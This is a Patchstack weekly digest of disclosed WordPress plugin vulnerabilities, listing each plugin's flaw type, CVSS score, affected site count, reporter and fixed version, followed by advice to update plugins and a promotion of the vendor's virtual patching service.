WordPress vulnerability news is a weekly digest of highlighted WordPress plugin security vulnerabilities or vulnerability discloses that have been published (there are other, less critical vulnerabilities on smaller plugins that unfortunately don’t make it to the list).
Keeping up to date with security vulnerabilities in WordPress and other CMSs is an important part of security. That is why we are analyzing WordPress plugins and newly disclosed vulnerabilities to make sure the sites using the mentioned plugins or themes are protected.
All the vulnerabilities you find in this article have received a vPatch to the Patchstack security module. It means that if you use Patchstack, your site is safe from these vulnerabilities, but it’s always strongly advised to update or delete vulnerable plugins from your site.
You can find all the vulnerabilities mentioned in our WordPress vulnerability news from our vulnerability database.
Active Directory Integration / LDAP Integration
Active Directory Integration / LDAP Integration Login for Intranet Sites plugin allows you to authenticate your users using their Active Directory/LDAP credentials into your WordPress site.
Vulnerability: Sensitive Data Exposure
Fixed in version: 4.1.1
Number of sites affected: 6,000+
CVSS 3.0 score: 7.5 (High severity)
Update the WordPress Active Directory Integration / LDAP Integration plugin to the latest available version (at least 4.1.1).
Lana Codes discovered and reported this Sensitive Data Exposure vulnerability in WordPress Active Directory Integration / LDAP Integration Plugin. This vulnerability has been fixed in version 4.1.1.
Profile Builder is the all-in-one user profile and registration plugin for WordPress.
Vulnerability: Sensitive Data Exposure
Fixed in version: 3.9.1
Number of sites affected: 60,000+
CVSS 3.0 score: 9.8 (Critical severity)
Lana Codes discovered and reported this Sensitive Data Exposure vulnerability in WordPress Profile Builder Plugin. This vulnerability has been fixed in version 3.9.1.
Update the WordPress Profile Builder plugin to the latest available version (at least 3.9.1).
Custom 404 Pro
Allows users to replace the default 404 page with a custom page from the Pages section in the Admin Panel.
Vulnerability: SQL Injection
Fixed in version: 3.7.3
Number of sites affected: 10,000+
CVSS 3.0 score: 9.8 (Critical severity)
An unknown person discovered and reported this SQL Injection vulnerability in WordPress Custom 404 Pro Plugin.
This could allow a malicious actor to directly interact with your database, including but not limited to stealing information.
This vulnerability has been fixed in version 3.7.3.
Shield Security – Smart Bot Blocking & Intrusion Prevention
With Shield, your site will start to block visitors as they probe your site looking for vulnerabilities, and before they can begin to do any damage.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 17.0.18
Number of sites affected: 50,000+
CVSS 3.0 score: 7.1 (High severity)
Ramuel Gall discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Shield Security Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has been fixed in version 17.0.18.
Japanized For WooCommerce
This plugin is an additional feature plugin that makes WooCommerce easier to use in Japan.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: No patched version available.
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
Erwan LR discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Japanized For WooCommerce Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has not been known to be fixed yet.
miniOrange’s Google Authenticator
Secure the login page for your WordPress website using TOTP Login 2FA methods like Duo/Microsoft/Google Authenticator.
Vulnerability: Broken Access Control
Fixed in version: 5.6.6
Number of sites affected: 20,000+
CVSS 3.0 score: 7.5 (High severity)
Ramuel Gall discovered and reported this Broken Access Control vulnerability in WordPress miniOrange’s Google Authenticator Plugin. This vulnerability has been fixed in version 5.6.6.
Update the WordPress miniOrange’s Google Authenticator plugin to the latest available version (at least 5.6.6).
ReviewX – Multi-criteria Rating & Reviews for WooCommerce
Add your authentic customer reviews on your WooCommerce store using the WooCommerce Review plugin.
Vulnerability: SQL Injection
Fixed in version: No patched version is available.
Number of sites affected: 10,000+
CVSS 3.0 score: 8.5 (High severity)
Joshua Martinelle discovered and reported this SQL Injection vulnerability in WordPress ReviewX Plugin.
This could allow a malicious actor to directly interact with your database, including but not limited to stealing information.
This vulnerability has not been known to be fixed yet.
Donation Forms by Charitable – Donations Plugin & Fundraising Platform for WordPress
That’s why Charitable makes it painless to create and publish high-converting donation forms and fundraising campaigns on your website.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: No patched version is available. No reply from the vendor.
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
TEAM WEBoB of BoB 11th discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Charitable Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has not been known to be fixed yet.
Accordion & FAQ – Helpie WordPress Accordion FAQ Plugin
Accordion, FAQ & Docs – Helpie FAQ is an advanced WordPress FAQ Plugin for effortlessly creating, editing, and embedding FAQs and Accordions on your WordPress website.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.9.7
Number of sites affected: 10,000+
CVSS 3.0 score: 7.1 (High severity)
Wordfence discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Accordion & FAQ – Helpie WordPress Accordion FAQ Plugin Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.9.7.
Update the WordPress Accordion & FAQ – Helpie WordPress Accordion FAQ Plugin plugin to the latest available version (at least 1.9.7).
YARPP – Yet Another Related Posts Plugin
Yet Another Related Posts Plugin (YARPP) is a professionally maintained, highly customizable, performant, and feature-rich plugin that displays pages, posts, and custom post types related to the current entry.
Vulnerability: Local File Inclusion
Fixed in version: No patched version is available. No reply from the vendor.
Number of sites affected: 100,000+
CVSS 3.0 score: 7.7 (High severity)
Rafie Muhammad (Patchstack) discovered and reported this Local File Inclusion vulnerability in WordPress YARPP Plugin.
This could allow a malicious actor to include local files of the target website and show its output on the screen. Files that store credentials, such as database credentials, could potentially allow complete database takeover depending on the configuration.
This vulnerability has not been known to be fixed yet.
WP Limit Login Attempts
Limit Login Attempts for login protection, and protect the site from brute force attacks.
This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.7.2
Number of sites affected: 30,000+
CVSS 3.0 score: 7.1 (High severity)
Marco Wotschka discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress WP Limit Login Attempts Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.7.2.
Update the WordPress WP Limit Login Attempts plugin to the latest available version (at least 1.7.2).
See more WP Limit Login Attempts vulnerabilities here.
Formidable Forms
You can use the drag-and-drop WordPress forms plugin to create a contact form, survey, quiz, registration form, payment form, lead form, or calculator form.
Vulnerability: PHP Object Injection
Fixed in version: 6.2
Number of sites affected: 300,000+
CVSS 3.0 score: 9.8 (Critical severity)
Nguyen Huu Do discovered and reported this PHP Object Injection vulnerability in WordPress Formidable Forms Plugin.
This could allow a malicious actor to execute code injection, SQL injection, path traversal, denial of service, and more if a proper POP chain is present. This vulnerability has been fixed in version 6.2.
Amelia
Amelia Lite WordPress Booking Plugin is a free, well-established booking system for the smooth management of online appointment scheduling and event reservation processes.
Vulnerability: Cross-Site Scripting (XSS)
Fixed in version: 1.0.76
Number of sites affected: 50,000+
CVSS 3.0 score: 7.1 (High severity)
minhtuanact discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Amelia Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has been fixed in version 1.0.76.
WCFM Membership
A simple WooCommerce memberships plugin.
Vulnerability: Privilege Escalation
Fixed in version: 2.10.1
Number of sites affected: 20,000+
CVSS 3.0 score: 9.8 (Critical severity)
Chloe Chamberland discovered and reported this Privilege Escalation vulnerability in WordPress WCFM Membership Plugin.
This could allow a malicious actor to escalate their low-privileged account to something with higher privileges. After this, they could take full control of the website if high privileges are gained.
This vulnerability has been fixed in version 2.10.1. Update the WordPress WCFM Membership plugin to the latest available version (at least 2.10.1).
WCFM Marketplace
WooCommerce Multivendor Marketplace (WCFM Marketplace) is front end multi-vendor marketplace plugin on WordPress, powered by WooCommerce.
Vulnerability: Missing Authorization vulnerability
Fixed in version: 3.4.12
Number of sites affected: 30,000+
CVSS 3.0 score: 8.8 (High severity)
Chloe Chamberland discovered and reported this Broken Access Control vulnerability in WordPress WCFM Marketplace Plugin. This vulnerability has been fixed in version 3.4.12.
Update the WordPress WCFM Marketplace plugin to the latest available version (at least 3.4.12).
Advanced Custom Fields (ACF)
Advanced Custom Fields (ACF) turns WordPress sites into a fully-fledged content management system by giving you all the tools to do more with your data.
Vulnerability: PHP Object Injection
Fixed in version: 6.1.0
Number of sites affected: 2+ million
CVSS 3.0 score: 8.5 (High severity)
Is this plugin known to be exploited? -> Check the WordPress Advanced Custom Fields Plugin page on our database.
Update the WordPress Advanced Custom Fields plugin to the latest available version (at least 5.12.5 or 6.1.0).
Unknown discovered and reported this PHP Object Injection vulnerability in WordPress Advanced Custom Fields Plugin. This could allow a malicious actor to execute code injection, SQL injection, path traversal, denial of service, and more if a proper POP chain is present. This vulnerability has been fixed in version 6.1.0.
Solidres – Hotel booking plugin for WordPress
Solidres can transform your beloved WordPress website into a hotel booking website.
Vulnerability: Cross Site Scripting (XSS)
Fixed in version: No patched version available
Number of sites affected: 100+
CVSS 3.0 score: 7.1 (High severity)
Erwan LR (WPScan) discovered and reported this Cross-Site Scripting (XSS) vulnerability in WordPress Solidres – Hotel booking plugin Plugin.
This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.
This vulnerability has not been known to be fixed yet.
See more Solidres – Hotel booking plugin for WordPress vulnerabilities.
WordPress Vulnerability News – Conclusion
See the full list of vulnerabilities here.
WordPress sites are being hacked and infected every day. Some statistics say that about 30,000 websites are infected with some type of malware daily.
Every public website is a resource available on the internet and therefore it’s a target. It’s important to understand that as soon as your website is available to the public, it immediately becomes a target.
It can take just days from a disclosed plugin vulnerability to a full-scale attack campaign. Attacks of this nature are almost always automated.
To be able to fight back, you have a small time window to take action. In such cases, the vPatches have critical importance.
Always keep your plugins updated. If possible, enable automatic updates. If you are using any of the mentioned plugins, you need to update it with the latest version as soon as possible.
Patchstack gets vPatches that are distributed automatically among the sites when vulnerabilities are discovered. Threat intelligence and prevention are our main focus and thus our security engine is updated on a daily basis.
Websites with a Patchstack installed are protected from the security issues mentioned in this article. If you are not protecting your WordPress site against plugin vulnerabilities yet go and start for free here.